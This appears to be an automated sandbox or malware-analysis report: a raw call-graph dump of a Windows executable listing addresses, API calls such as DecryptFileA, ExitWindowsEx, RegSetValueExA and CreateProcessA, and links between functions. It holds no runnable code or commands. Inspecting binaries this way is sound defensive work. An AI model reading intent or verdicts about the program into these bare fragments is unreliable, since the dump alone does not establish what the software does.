2454->2456 2457 1063017 SetCurrentDirectoryA 2454->2457 2455->2454 2458 1062fd6 DecryptFileA 2455->2458 2456->2457 2721 106621e GetWindowsDirectoryA 2456->2721 2459 1063026 2457->2459 2460 1063054 2457->2460 2458->2454 2465 1062ff0 2458->2465 2464 10644b9 20 API calls 2459->2464 2462 1063061 2460->2462 2731 1063b26 2460->2731 2462->2445 2467 106307a 2462->2467 2740 106256d 2462->2740 2469 1063037 2464->2469 2465->2454 2472 1063098 2467->2472 2751 1063ba2 2467->2751 2807 1066285 GetLastError 2469->2807 2472->2445 2473 10630af 2472->2473 2809 1064169 2473->2809 2477 10652d6 2476->2477 2485 1065316 2476->2485 2478 1065300 LocalFree LocalFree 2477->2478 2480 10652eb SetFileAttributesA DeleteFileA 2477->2480 2478->2477 2478->2485 2479 106538c 2482 1066ce0 4 API calls 2479->2482 2480->2478 2481 1065374 2481->2479 3115 1061fe1 2481->3115 2484 1062c72 2482->2484 2484->2385 2484->2393 2485->2481 2486 106535e SetCurrentDirectoryA 2485->2486 2487 10665e8 4 API calls 2485->2487 2488 1062390 13 API calls 2486->2488 2487->2486 2488->2481 2490 1061f9a 2489->2490 2493 1061f9f 2489->2493 2491 1061ea7 15 API calls 2490->2491 2491->2493 2492 1061fc0 2495 1061fcf ExitWindowsEx 2492->2495 2496 1061ee2 GetCurrentProcess OpenProcessToken 2492->2496 2497 1061fd9 2492->2497 2493->2492 2494 10644b9 20 API calls 2493->2494 2493->2497 2494->2492 2495->2497 2499 1061f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2496->2499 2500 1061f0e 2496->2500 2497->2385 2499->2500 2501 1061f6b ExitWindowsEx 2499->2501 2503 10644b9 20 API calls 2500->2503 2501->2500 2502 1061f1f 2501->2502 2504 1066ce0 4 API calls 2502->2504 2503->2502 2505 1061f8c 2504->2505 2505->2385 2507 10646b6 2506->2507 2508 1062d1a 2506->2508 2507->2508 2509 10646be FindResourceA LoadResource LockResource 2507->2509 2508->2398 2508->2399 2509->2508 2510 10646df memcpy_s FreeResource 2509->2510 2510->2508 2517 1065e17 2511->2517 2521 1065cc3 2511->2521 2512 1066ce0 4 API calls 2515 1062e2c 2512->2515 2513 1065dd0 2516 1065dec GetModuleFileNameA 2513->2516 2513->2517 2514 1065ced CharNextA 2514->2521 2515->2413 2515->2414 2516->2517 2518 1065e0a 2516->2518 2517->2512 2587 10666c8 2518->2587 2520 1066218 2596 1066e2a 2520->2596 2521->2513 2521->2514 2521->2517 2521->2520 2524 1065e36 CharUpperA 2521->2524 2530 1065f9f CharUpperA 2521->2530 2531 1065f59 CompareStringA 2521->2531 2532 1066003 CharUpperA 2521->2532 2533 1065edc CharUpperA 2521->2533 2534 10660a2 CharUpperA 2521->2534 2535 106667f IsDBCSLeadByte CharNextA 2521->2535 2592 106658a 2521->2592 2524->2521 2525 10661d0 2524->2525 2526 10644b9 20 API calls 2525->2526 2527 10661e7 2526->2527 2528 10661f7 ExitProcess 2527->2528 2529 10661f0 CloseHandle 2527->2529 2529->2528 2530->2521 2531->2521 2532->2521 2533->2521 2534->2521 2535->2521 2538 10624cb 2537->2538 2541 10623b9 2537->2541 2539 1066ce0 4 API calls 2538->2539 2540 10624dc 2539->2540 2540->2423 2541->2538 2542 10623e9 FindFirstFileA 2541->2542 2542->2538 2550 1062407 2542->2550 2543 1062421 lstrcmpA 2545 1062431 lstrcmpA 2543->2545 2546 10624a9 FindNextFileA 2543->2546 2544 1062479 2547 1062488 SetFileAttributesA DeleteFileA 2544->2547 2545->2546 2545->2550 2548 10624bd FindClose RemoveDirectoryA 2546->2548 2546->2550 2547->2546 2548->2538 2549 106658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2546 2550->2549 2551 1062390 5 API calls 2550->2551 2551->2550 2556 1063737 2552->2556 2558 106372d 2552->2558 2553 10644b9 20 API calls 2566 10639fc 2553->2566 2554 1066ce0 4 API calls 2555 1062e92 2554->2555 2555->2402 2555->2423 2567 10618a3 2555->2567 2556->2558 2559 10638a4 2556->2559 2556->2566 2603 10628e8 2556->2603 2558->2553 2558->2566 2559->2558 2560 10639c1 MessageBeep 2559->2560 2559->2566 2561 106681f 10 API calls 2560->2561 2562 10639ce 2561->2562 2563 10667c9 EnumResourceLanguagesA 2562->2563 2565 10639d8 MessageBoxA 2562->2565 2563->2565 2565->2566 2566->2554 2568 10618d5 2567->2568 2569 10619b8 2567->2569 2632 10617ee LoadLibraryA 2568->2632 2570 1066ce0 4 API calls 2569->2570 2572 10619d5 2570->2572 2572->2423 2572->2435 2574 10618e5 GetCurrentProcess OpenProcessToken 2574->2569 2575 1061900 GetTokenInformation 2574->2575 2576 10619aa CloseHandle 2575->2576 2577 1061918 GetLastError 2575->2577 2576->2569 2577->2576 2578 1061927 LocalAlloc 2577->2578 2579 1061938 GetTokenInformation 2578->2579 2580 10619a9 2578->2580 2581 10619a2 LocalFree 2579->2581 2582 106194e AllocateAndInitializeSid 2579->2582 2580->2576 2581->2580 2582->2581 2585 106196e 2582->2585 2583 1061999 FreeSid 2583->2581 2584 1061975 EqualSid 2584->2585 2586 106198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2588 10666d5 2587->2588 2589 10666f3 2588->2589 2591 10666e5 CharNextA 2588->2591 2599 1066648 2588->2599 2589->2517 2591->2588 2593 106659b 2592->2593 2593->2593 2594 10665b8 CharPrevA 2593->2594 2595 10665ab 2593->2595 2594->2595 2595->2521 2602 1066cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 106621d 2600 106665d IsDBCSLeadByte 2599->2600 2601 1066668 2599->2601 2600->2601 2601->2588 2602->2598 2604 1062a62 2603->2604 2611 106290d 2603->2611 2605 1062a75 2604->2605 2606 1062a6e GlobalFree 2604->2606 2605->2559 2606->2605 2608 1062955 GlobalAlloc 2608->2604 2609 1062968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 1062a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 1062a80 GlobalUnlock 2611->2612 2613 1062773 2611->2613 2612->2604 2614 10628b2 2613->2614 2615 10627a3 CharUpperA CharNextA CharNextA 2613->2615 2616 10628b7 GetSystemDirectoryA 2614->2616 2615->2616 2617 10627db 2615->2617 2620 10628bf 2616->2620 2618 10627e3 2617->2618 2619 10628a8 GetWindowsDirectoryA 2617->2619 2625 106658a CharPrevA 2618->2625 2619->2620 2621 10628d2 2620->2621 2623 106658a CharPrevA 2620->2623 2622 1066ce0 4 API calls 2621->2622 2624 10628e2 2622->2624 2623->2621 2624->2611 2626 1062810 RegOpenKeyExA 2625->2626 2626->2620 2627 1062837 RegQueryValueExA 2626->2627 2628 106285c 2627->2628 2629 106289a RegCloseKey 2627->2629 2630 1062867 ExpandEnvironmentStringsA 2628->2630 2631 106287a 2628->2631 2629->2620 2630->2631 2631->2629 2633 1061826 GetProcAddress 2632->2633 2634 1061890 2632->2634 2636 1061889 FreeLibrary 2633->2636 2637 1061839 AllocateAndInitializeSid 2633->2637 2635 1066ce0 4 API calls 2634->2635 2638 106189f 2635->2638 2636->2634 2637->2636 2640 106185f FreeSid 2637->2640 2638->2569 2638->2574 2640->2636 2642 106468f 7 API calls 2641->2642 2643 10651f9 LocalAlloc 2642->2643 2644 106522d 2643->2644 2645 106520d 2643->2645 2647 106468f 7 API calls 2644->2647 2646 10644b9 20 API calls 2645->2646 2648 106521e 2646->2648 2649 106523a 2647->2649 2650 1066285 GetLastError 2648->2650 2651 1065262 lstrcmpA 2649->2651 2652 106523e 2649->2652 2657 1062f4d 2650->2657 2654 1065272 LocalFree 2651->2654 2655 106527e 2651->2655 2653 10644b9 20 API calls 2652->2653 2656 106524f LocalFree 2653->2656 2654->2657 2658 10644b9 20 API calls 2655->2658 2656->2657 2657->2438 2657->2440 2657->2445 2659 1065290 LocalFree 2658->2659 2659->2657 2661 106468f 7 API calls 2660->2661 2662 1065175 2661->2662 2663 106517a 2662->2663 2664 10651af 2662->2664 2665 10644b9 20 API calls 2663->2665 2666 106468f 7 API calls 2664->2666 2667 106518d 2665->2667 2668 10651c0 2666->2668 2667->2442 2822 1066298 2668->2822 2671 10651e1 2671->2442 2672 10644b9 20 API calls 2672->2667 2674 106468f 7 API calls 2673->2674 2675 10655c7 LocalAlloc 2674->2675 2676 10655fd 2675->2676 2677 10655db 2675->2677 2679 106468f 7 API calls 2676->2679 2678 10644b9 20 API calls 2677->2678 2680 10655ec 2678->2680 2681 106560a 2679->2681 2684 1066285 GetLastError 2680->2684 2682 1065632 lstrcmpA 2681->2682 2683 106560e 2681->2683 2686 1065645 2682->2686 2687 106564b LocalFree 2682->2687 2685 10644b9 20 API calls 2683->2685 2709 10655f1 2684->2709 2688 106561f LocalFree 2685->2688 2686->2687 2689 1065696 2687->2689 2690 106565b 2687->2690 2688->2709 2691 106589f 2689->2691 2692 10656ae GetTempPathA 2689->2692 2698 1065467 49 API calls 2690->2698 2693 1066517 24 API calls 2691->2693 2696 10656eb 2692->2696 2697 10656c3 2692->2697 2693->2709 2694 1066ce0 4 API calls 2695 1062f7e 2694->2695 2695->2445 2695->2451 2703 1065717 GetDriveTypeA 2696->2703 2704 106586c GetWindowsDirectoryA 2696->2704 2696->2709 2834 1065467 2697->2834 2700 1065678 2698->2700 2702 10644b9 20 API calls 2700->2702 2700->2709 2702->2709 2707 1065730 GetFileAttributesA 2703->2707 2719 106572b 2703->2719 2868 106597d GetCurrentDirectoryA SetCurrentDirectoryA 2704->2868 2707->2719 2709->2694 2710 106597d 34 API calls 2710->2719 2711 1065467 49 API calls 2711->2696 2712 1062630 21 API calls 2712->2719 2714 10657c1 GetWindowsDirectoryA 2714->2719 2715 106658a CharPrevA 2716 10657e8 GetFileAttributesA 2715->2716 2717 10657fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 1065827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2707 2719->2709 2719->2710 2719->2712 2719->2714 2719->2715 2719->2718 2720 1065467 49 API calls 2719->2720 2864 1066952 2719->2864 2720->2719 2722 1066268 2721->2722 2723 1066249 2721->2723 2725 106597d 34 API calls 2722->2725 2724 10644b9 20 API calls 2723->2724 2726 106625a 2724->2726 2727 106625f 2725->2727 2728 1066285 GetLastError 2726->2728 2729 1066ce0 4 API calls 2727->2729 2728->2727 2730 1063013 2729->2730 2730->2445 2730->2457 2732 1063b2d 2731->2732 2732->2732 2733 1063b72 2732->2733 2734 1063b53 2732->2734 2934 1064fe0 2733->2934 2736 1066517 24 API calls 2734->2736 2737 1063b70 2736->2737 2738 1066298 10 API calls 2737->2738 2739 1063b7b 2737->2739 2738->2739 2739->2462 2741 1062622 2740->2741 2742 1062583 2740->2742 2961 10624e0 GetWindowsDirectoryA 2741->2961 2744 106258b 2742->2744 2745 10625e8 RegOpenKeyExA 2742->2745 2747 10625e3 2744->2747 2748 106259b RegOpenKeyExA 2744->2748 2746 1062609 RegQueryInfoKeyA 2745->2746 2745->2747 2749 10625d1 RegCloseKey 2746->2749 2747->2467 2748->2747 2750 10625bc RegQueryValueExA 2748->2750 2749->2747 2750->2749 2752 1063bdb 2751->2752 2771 1063bec 2751->2771 2753 106468f 7 API calls 2752->2753 2753->2771 2754 1063c03 memset 2754->2771 2755 1063d13 2756 10644b9 20 API calls 2755->2756 2762 1063d26 2756->2762 2758 1066ce0 4 API calls 2759 1063f60 2758->2759 2759->2472 2760 1063fd7 2760->2762 3060 1062267 2760->3060 2761 1063d7b CompareStringA 2761->2760 2761->2771 2762->2758 2763 1063fab 2766 10644b9 20 API calls 2763->2766 2770 1063fbe LocalFree 2766->2770 2767 1063f46 LocalFree 2767->2762 2768 1063f1e LocalFree 2768->2760 2768->2771 2770->2762 2771->2754 2771->2755 2771->2760 2771->2761 2771->2762 2771->2763 2771->2767 2771->2768 2772 106468f 7 API calls 2771->2772 2774 1063cc7 CompareStringA 2771->2774 2785 1063e10 2771->2785 2969 1061ae8 2771->2969 3010 106202a memset memset RegCreateKeyExA 2771->3010 3036 1063fef 2771->3036 2772->2771 2774->2771 2775 1063f92 2778 10644b9 20 API calls 2775->2778 2776 1063e1f GetProcAddress 2777 1063f64 2776->2777 2776->2785 2780 10644b9 20 API calls 2777->2780 2779 1063fa9 2778->2779 2781 1063f7c LocalFree 2779->2781 2782 1063f75 FreeLibrary 2780->2782 2783 1066285 GetLastError 2781->2783 2782->2781 2784 1063f8b 2783->2784 2784->2762 2785->2775 2785->2776 2786 1063f40 FreeLibrary 2785->2786 2787 1063eff FreeLibrary 2785->2787 3050 1066495 2785->3050 2786->2767 2787->2768 2789 106468f 7 API calls 2788->2789 2790 1063a55 LocalAlloc 2789->2790 2791 1063a8e 2790->2791 2792 1063a6c 2790->2792 2794 106468f 7 API calls 2791->2794 2793 10644b9 20 API calls 2792->2793 2795 1063a7d 2793->2795 2796 1063a98 2794->2796 2797 1066285 GetLastError 2795->2797 2798 1063ac5 lstrcmpA 2796->2798 2799 1063a9c 2796->2799 2806 1062f64 2797->2806 2800 1063b0d LocalFree 2798->2800 2801 1063ada 2798->2801 2802 10644b9 20 API calls 2799->2802 2800->2806 2803 1066517 24 API calls 2801->2803 2804 1063aad LocalFree 2802->2804 2805 1063aec LocalFree 2803->2805 2804->2806 2805->2806 2806->2438 2806->2445 2808 106628f 2807->2808 2808->2445 2810 106468f 7 API calls 2809->2810 2811 106417d LocalAlloc 2810->2811 2812 1064195 2811->2812 2813 10641a8 2811->2813 2814 10644b9 20 API calls 2812->2814 2815 106468f 7 API calls 2813->2815 2817 10641a6 2814->2817 2816 10641b5 2815->2816 2818 10641c5 lstrcmpA 2816->2818 2820 10641b9 2816->2820 2817->2445 2819 10641e6 LocalFree 2818->2819 2818->2820 2819->2817 2821 10644b9 20 API calls 2820->2821 2821->2819 2823 106171e _vsnprintf 2822->2823 2833 10662c9 FindResourceA 2823->2833 2825 1066353 2827 1066ce0 4 API calls 2825->2827 2826 10662cb LoadResource LockResource 2826->2825 2829 10662e0 2826->2829 2828 10651ca 2827->2828 2828->2671 2828->2672 2830 1066355 FreeResource 2829->2830 2831 106631b FreeResource 2829->2831 2830->2825 2832 106171e _vsnprintf 2831->2832 2832->2833 2833->2825 2833->2826 2835 106548a 2834->2835 2854 106551a 2834->2854 2894 10653a1 2835->2894 2838 1065581 2841 1066ce0 4 API calls 2838->2841 2840 1065495 2840->2838 2844 10654c2 GetSystemInfo 2840->2844 2845 106550c 2840->2845 2846 106559a 2841->2846 2842 106554d 2842->2838 2849 106597d 34 API calls 2842->2849 2843 106553b CreateDirectoryA 2847 1065577 2843->2847 2848 1065547 2843->2848 2852 10654da 2844->2852 2850 106658a CharPrevA 2845->2850 2846->2709 2858 1062630 GetWindowsDirectoryA 2846->2858 2851 1066285 GetLastError 2847->2851 2848->2842 2853 106555c 2849->2853 2850->2854 2855 106557c 2851->2855 2852->2845 2856 106658a CharPrevA 2852->2856 2853->2838 2857 1065568 RemoveDirectoryA 2853->2857 2905 10658c8 2854->2905 2855->2838 2856->2845 2857->2838 2859 106265e 2858->2859 2860 106266f 2858->2860 2861 10644b9 20 API calls 2859->2861 2862 1066ce0 4 API calls 2860->2862 2861->2860 2863 1062687 2862->2863 2863->2696 2863->2711 2865 10669a1 2864->2865 2866 106696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 1066989 MulDiv 2866->2867 2867->2865 2869 10659dd GetDiskFreeSpaceA 2868->2869 2870 10659bb 2868->2870 2872 1065ba1 memset 2869->2872 2873 1065a21 MulDiv 2869->2873 2871 10644b9 20 API calls 2870->2871 2874 10659cc 2871->2874 2875 1066285 GetLastError 2872->2875 2873->2872 2876 1065a50 GetVolumeInformationA 2873->2876 2880 1066285 GetLastError 2874->2880 2877 1065bbc GetLastError FormatMessageA 2875->2877 2878 1065ab5 SetCurrentDirectoryA 2876->2878 2879 1065a6e memset 2876->2879 2881 1065be3 2877->2881 2889 1065acc 2878->2889 2882 1066285 GetLastError 2879->2882 2887 10659d1 2880->2887 2883 10644b9 20 API calls 2881->2883 2884 1065a89 GetLastError FormatMessageA 2882->2884 2885 1065bf5 SetCurrentDirectoryA 2883->2885 2884->2881 2885->2887 2886 1066ce0 4 API calls 2888 1065c11 2886->2888 2887->2886 2888->2696 2890 1065b0a 2889->2890 2892 1065b20 2889->2892 2891 10644b9 20 API calls 2890->2891 2891->2887 2892->2887 2917 106268b 2892->2917 2896 10653bf 2894->2896 2895 106171e _vsnprintf 2895->2896 2896->2895 2897 106658a CharPrevA 2896->2897 2900 1065415 GetTempFileNameA 2896->2900 2898 10653fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 106544f CreateDirectoryA 2898->2899 2899->2900 2901 106543a 2899->2901 2900->2901 2902 1065429 DeleteFileA CreateDirectoryA 2900->2902 2903 1066ce0 4 API calls 2901->2903 2902->2901 2904 1065449 2903->2904 2904->2840 2906 10658d8 2905->2906 2906->2906 2907 10658df LocalAlloc 2906->2907 2908 10658f3 2907->2908 2909 1065919 2907->2909 2910 10644b9 20 API calls 2908->2910 2912 106658a CharPrevA 2909->2912 2916 1065906 2910->2916 2911 1066285 GetLastError 2913 1065534 2911->2913 2914 1065931 CreateFileA LocalFree 2912->2914 2913->2842 2913->2843 2915 106595b CloseHandle GetFileAttributesA 2914->2915 2914->2916 2915->2916 2916->2911 2916->2913 2918 10626e5 2917->2918 2919 10626b9 2917->2919 2920 106271f 2918->2920 2921 10626ea 2918->2921 2922 106171e _vsnprintf 2919->2922 2925 10626e3 2920->2925 2929 106171e _vsnprintf 2920->2929 2924 106171e _vsnprintf 2921->2924 2923 10626cc 2922->2923 2926 10644b9 20 API calls 2923->2926 2928 10626fd 2924->2928 2927 1066ce0 4 API calls 2925->2927 2926->2925 2930 106276d 2927->2930 2931 10644b9 20 API calls 2928->2931 2932 1062735 2929->2932 2930->2887 2931->2925 2933 10644b9 20 API calls 2932->2933 2933->2925 2935 106468f 7 API calls 2934->2935 2936 1064ff5 FindResourceA LoadResource LockResource 2935->2936 2937 1065020 2936->2937 2938 106515f 2936->2938 2939 1065057 2937->2939 2940 1065029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2940 2938->2737 2953 1064efd 2939->2953 2940->2939 2943 1065060 2945 10644b9 20 API calls 2943->2945 2944 106507c 2946 10644b9 20 API calls 2944->2946 2949 1065075 2944->2949 2945->2949 2946->2949 2947 1065110 FreeResource 2948 106511d 2947->2948 2950 106513a 2948->2950 2951 10644b9 20 API calls 2948->2951 2949->2947 2949->2948 2950->2938 2952 106514c SendMessageA 2950->2952 2951->2950 2952->2938 2954 1064f4a 2953->2954 2955 1064fa1 2954->2955 2956 1064980 25 API calls 2954->2956 2957 1066ce0 4 API calls 2955->2957 2959 1064f67 2956->2959 2958 1064fc6 2957->2958 2958->2943 2958->2944 2959->2955 2960 1064b60 FindCloseChangeNotification 2959->2960 2960->2955 2962 1062510 2961->2962 2963 106255b 2961->2963 2964 106658a CharPrevA 2962->2964 2965 1066ce0 4 API calls 2963->2965 2966 1062522 WritePrivateProfileStringA _lopen 2964->2966 2967 1062569 2965->2967 2966->2963 2968 1062548 _llseek _lclose 2966->2968 2967->2747 2968->2963 2970 1061b25 2969->2970 3074 1061a84 2970->3074 2972 1061b57 2973 106658a CharPrevA 2972->2973 2975 1061b8c 2972->2975 2973->2975 2974 10666c8 2 API calls 2976 1061bd1 2974->2976 2975->2974 2977 1061d73 2976->2977 2978 1061bd9 CompareStringA 2976->2978 2980 10666c8 2 API calls 2977->2980 2978->2977 2979 1061bf7 GetFileAttributesA 2978->2979 2981 1061d53 2979->2981 2982 1061c0d 2979->2982 2983 1061d7d 2980->2983 2984 1061d64 2981->2984 2982->2981 2989 1061a84 2 API calls 2982->2989 2985 1061d81 CompareStringA 2983->2985 2986 1061df8 LocalAlloc 2983->2986 2987 10644b9 20 API calls 2984->2987 2985->2986 2995 1061d9b 2985->2995 2986->2984 2988 1061e0b GetFileAttributesA 2986->2988 2990 1061d6c 2987->2990 2991 1061e1d 2988->2991 3006 1061e45 2988->3006 2992 1061c31 2989->2992 2994 1066ce0 4 API calls 2990->2994 2991->3006 2993 1061c50 LocalAlloc 2992->2993 3000 1061a84 2 API calls 2992->3000 2993->2984 2996 1061c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2996 2999 1061ea1 2994->2999 2995->2995 3001 1061dbe LocalAlloc 2995->3001 3002 1061cc2 2996->3002 3003 1061cf8 2996->3003 2999->2771 3000->2993 3001->2984 3004 1061de1 3001->3004 3002->2990 3007 1061d09 GetShortPathNameA 3003->3007 3008 1061d23 3003->3008 3005 106171e _vsnprintf 3004->3005 3005->3002 3080 1062aac 3006->3080 3007->3008 3009 106171e _vsnprintf 3008->3009 3009->3002 3011 1062256 3010->3011 3012 106209a 3010->3012 3013 1066ce0 4 API calls 3011->3013 3015 106171e _vsnprintf 3012->3015 3017 10620dc 3012->3017 3014 1062263 3013->3014 3014->2771 3016 10620af RegQueryValueExA 3015->3016 3016->3012 3016->3017 3018 10620e4 RegCloseKey 3017->3018 3019 10620fb GetSystemDirectoryA 3017->3019 3018->3011 3020 106658a CharPrevA 3019->3020 3021 106211b LoadLibraryA 3020->3021 3022 106212e GetProcAddress FreeLibrary 3021->3022 3023 1062179 GetModuleFileNameA 3021->3023 3022->3023 3025 106214e GetSystemDirectoryA 3022->3025 3024 10621de RegCloseKey 3023->3024 3028 1062177 LocalAlloc 3023->3028 3024->3011 3026 1062165 3025->3026 3025->3028 3027 106658a CharPrevA 3026->3027 3027->3028 3030 10621ec 3028->3030 3031 10621cd 3028->3031 3033 106171e _vsnprintf 3030->3033 3032 10644b9 20 API calls 3031->3032 3032->3024 3034 1062218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3011 3037 1064016 CreateProcessA 3036->3037 3048 1064106 3036->3048 3038 10640c4 3037->3038 3039 1064041 WaitForSingleObject GetExitCodeProcess 3037->3039 3041 1066285 GetLastError 3038->3041 3044 1064070 3039->3044 3040 1066ce0 4 API calls 3042 1064117 3040->3042 3043 10640c9 GetLastError FormatMessageA 3041->3043 3042->2771 3046 10644b9 20 API calls 3043->3046 3107 106411b 3044->3107 3046->3048 3047 1064096 CloseHandle CloseHandle 3047->3048 3049 10640ba 3047->3049 3048->3040 3049->3048 3051 10664c2 3050->3051 3052 106658a CharPrevA 3051->3052 3053 10664d8 GetFileAttributesA 3052->3053 3054 1066501 LoadLibraryA 3053->3054 3055 10664ea 3053->3055 3057 1066508 3054->3057 3055->3054 3056 10664ee LoadLibraryExA 3055->3056 3056->3057 3058 1066ce0 4 API calls 3057->3058 3059 1066513 3058->3059 3059->2785 3061 1062381 3060->3061 3062 1062289 RegOpenKeyExA 3060->3062 3063 1066ce0 4 API calls 3061->3063 3062->3061 3064 10622b1 RegQueryValueExA 3062->3064 3065 106238c 3063->3065 3066 10622e6 memset GetSystemDirectoryA 3064->3066 3067 1062374 RegCloseKey 3064->3067 3065->2762 3068 1062321 3066->3068 3069 106230f 3066->3069 3067->3061 3071 106171e _vsnprintf 3068->3071 3070 106658a CharPrevA 3069->3070 3070->3068 3072 106233f RegSetValueExA 3071->3072 3072->3067 3076 1061a9a 3074->3076 3077 1061aba 3076->3077 3079 1061aaf 3076->3079 3093 106667f 3076->3093 3077->2972 3078 106667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 1062ad4 GetModuleFileNameA 3080->3081 3082 1062be6 3080->3082 3083 1062b02 3081->3083 3084 1066ce0 4 API calls 3082->3084 3083->3082 3085 1062af1 IsDBCSLeadByte 3083->3085 3087 1062b11 CharNextA CharUpperA 3083->3087 3088 1062bca CharNextA 3083->3088 3089 1062bd3 CharNextA 3083->3089 3092 1062b43 CharPrevA 3083->3092 3098 10665e8 3083->3098 3086 1062bf5 3084->3086 3085->3083 3086->2990 3087->3083 3090 1062b8d CharUpperA 3087->3090 3088->3089 3089->3083 3090->3083 3092->3083 3094 1066689 3093->3094 3095 1066648 IsDBCSLeadByte 3094->3095 3096 1066697 CharNextA 3094->3096 3097 10666a5 3094->3097 3095->3094 3096->3094 3097->3076 3099 10665f4 3098->3099 3099->3099 3100 10665fb CharPrevA 3099->3100 3101 1066611 CharPrevA 3100->3101 3102 106661e 3101->3102 3103 106660b 3101->3103 3104 1066627 CharPrevA 3102->3104 3105 1066634 CharNextA 3102->3105 3106 106663d 3102->3106 3103->3101 3103->3102 3104->3105 3104->3106 3105->3106 3106->3083 3108 1064132 3107->3108 3110 106412a 3107->3110 3111 1061ea7 3108->3111 3110->3047 3112 1061eba 3111->3112 3114 1061ed3 3111->3114 3113 106256d 15 API calls 3112->3113 3113->3114 3114->3110 3116 1062026 3115->3116 3117 1061ff0 RegOpenKeyExA 3115->3117 3116->2479 3117->3116 3118 106200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3227 1066a20 __getmainargs 3228 10619e0 3229 1061a24 GetDesktopWindow 3228->3229 3230 1061a03 3228->3230 3231 10643d0 11 API calls 3229->3231 3232 1061a16 EndDialog 3230->3232 3233 1061a20 3230->3233 3234 1061a33 LoadStringA SetDlgItemTextA MessageBeep 3231->3234 3232->3233 3235 1066ce0 4 API calls 3233->3235 3234->3233 3236 1061a7e 3235->3236 3237 1066bef _XcptFilter 3238 1067270 _except_handler4_common 3239 10669b0 3240 10669b5 3239->3240 3248 1066fbe GetModuleHandleW 3240->3248 3242 10669c1 __set_app_type __p__fmode __p__commode 3243 10669f9 3242->3243 3244 1066a02 __setusermatherr 3243->3244 3245 1066a0e 3243->3245 3244->3245 3250 10671ef _controlfp 3245->3250 3247 1066a13 3249 1066fcf 3248->3249 3249->3242 3250->3247 3251 10634f0 3252 1063504 3251->3252 3253 10635b8 3251->3253 3252->3253 3254 10635be GetDesktopWindow 3252->3254 3255 106351b 3252->3255 3256 1063671 EndDialog 3253->3256 3257 1063526 3253->3257 3258 10643d0 11 API calls 3254->3258 3259 106354f 3255->3259 3260 106351f 3255->3260 3256->3257 3261 10635d6 3258->3261 3259->3257 3263 1063559 ResetEvent 3259->3263 3260->3257 3262 106352d TerminateThread EndDialog 3260->3262 3265 10635e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3261->3265 3266 106361d SetWindowTextA CreateThread 3261->3266 3262->3257 3264 10644b9 20 API calls 3263->3264 3267 1063581 3264->3267 3265->3266 3266->3257 3268 1063646 3266->3268 3269 106359b SetEvent 3267->3269 3271 106358a SetEvent 3267->3271 3270 10644b9 20 API calls 3268->3270 3272 1063680 4 API calls 3269->3272 3270->3253 3271->3257 3272->3253 3273 1066ef0 3274 1066f2d 3273->3274 3276 1066f02 3273->3276 3275 1066f27 ?terminate@ 3275->3274 3276->3274 3276->3275

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_01064702 53 Function_01061680 0->53 81 Function_010616B3 0->81 1 Function_01066C03 27 Function_0106724D 1->27 2 Function_01067000 3 Function_01064200 4 Function_01063100 95 Function_010643D0 4->95 5 Function_0106490C 6 Function_01067208 7 Function_01065C17 8 Function_01066517 84 Function_010644B9 8->84 9 Function_01063210 17 Function_01064224 9->17 48 Function_0106597D 9->48 58 Function_0106658A 9->58 9->84 89 Function_010658C8 9->89 9->95 10 Function_01067010 11 Function_0106171E 12 Function_0106621E 12->48 51 Function_01066285 12->51 12->84 99 Function_01066CE0 12->99 13 Function_0106681F 13->99 119 Function_010666F9 13->119 14 Function_01062F1D 14->12 16 Function_01063B26 14->16 24 Function_01063A3F 14->24 36 Function_01065164 14->36 41 Function_0106256D 14->41 43 Function_01064169 14->43 14->51 14->58 70 Function_01063BA2 14->70 74 Function_010655A0 14->74 14->84 96 Function_010651E5 14->96 14->99 15 Function_0106411B 68 Function_01061EA7 15->68 16->8 66 Function_01066298 16->66 97 Function_01064FE0 16->97 17->53 17->84 18 Function_01067120 19 Function_01066A20 20 Function_01066E2A 113 Function_01066CF0 20->113 21 Function_0106202A 21->11 21->58 21->84 21->99 22 Function_01064C37 23 Function_01062630 23->84 23->99 24->8 24->51 57 Function_0106468F 24->57 24->84 25 Function_01066C3F 26 Function_01066F40 28 Function_01066648 29 Function_01066F54 29->6 29->27 30 Function_01067155 31 Function_01066952 32 Function_01064A50 33 Function_01063450 33->95 34 Function_01065467 34->48 34->51 34->53 56 Function_01061781 34->56 34->58 75 Function_010653A1 34->75 34->89 34->99 35 Function_01062267 35->11 35->58 35->99 36->57 36->66 36->84 37 Function_01064B60 38 Function_01066A60 38->6 38->25 38->27 38->30 39 Function_01067060 38->39 118 Function_01062BFB 38->118 39->10 39->18 40 Function_01066760 98 Function_010624E0 41->98 42 Function_0106476D 42->8 77 Function_010666AE 42->77 43->57 43->84 44 Function_01062773 44->53 44->56 44->58 44->99 45 Function_01067270 46 Function_01066C70 47 Function_0106667F 47->28 48->51 59 Function_0106268B 48->59 48->84 48->99 49 Function_0106487A 49->5 50 Function_01061A84 50->47 52 Function_01064980 52->49 52->84 53->56 54 Function_01063680 55 Function_01066380 58->81 59->11 59->84 59->99 60 Function_01062A89 61 Function_01066495 61->56 61->58 61->99 62 Function_01066793 63 Function_01062390 63->53 63->58 63->63 63->81 63->99 64 Function_01061F90 64->68 64->84 64->99 65 Function_01065C9E 65->7 65->20 65->47 65->53 65->58 65->84 90 Function_010666C8 65->90 65->99 100 Function_010631E0 65->100 66->11 66->99 67 Function_01064E99 67->53 68->41 69 Function_01066FA5 69->27 70->21 70->35 70->51 70->56 70->57 70->61 70->84 70->99 106 Function_01063FEF 70->106 110 Function_01061AE8 70->110 71 Function_010672A2 72 Function_010618A3 72->99 105 Function_010617EE 72->105 73 Function_01064CA0 74->8 74->23 74->31 